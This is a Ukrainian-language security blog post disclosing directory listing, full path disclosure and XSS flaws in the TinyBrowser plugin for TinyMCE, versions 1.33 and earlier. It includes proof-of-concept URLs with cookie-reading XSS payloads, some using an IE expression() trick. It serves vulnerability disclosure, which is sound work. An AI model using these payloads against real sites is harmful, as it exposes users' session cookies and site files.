Websecurity - Веб безпека

У грудні, 28.12.2012, я знайшов численні уразливості в TinyBrowser для TinyMCE. Це Information Leakage, Full path disclosure та Cross-Site Scripting уразливості. Про що вже повідомив розробникам.

Раніше я вже писав про Виконання коду в TinyBrowser.

Information Leakage (Directory Listing) (WASC-13):

http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=

http://site/tiny_mce/plugins/tinybrowser/edit.php?type=

Виводиться зміст коренової директорії сайта, якщо немає директорії для завантаження.

Full path disclosure (WASC-13):

В tinybrowser.php і edit.php виводиться FPD якщо немає папки для завантаження.

Якщо завантажити скрипт з розширенням зображення, то також випадають FPD.

XSS (WASC-08):

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22);alert(document.cookie)//

Для IE:

http://site/tiny_mce/plugins/tinybrowser/upload.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))
http://site/tiny_mce/plugins/tinybrowser/edit.php?type=%22%20style=%22xss:\0065xpression(alert(document.cookie))

Уразливі старі версії TinyBrowser (такі як 1.33 та попередні версії). В версії TinyBrowser 1.42 дані уразливості вже виправлені.

This entry was posted on 23:54 08.01.2013 and is filed under Уразливості. You can follow any responses to this entry through the RSS 2.0 feed.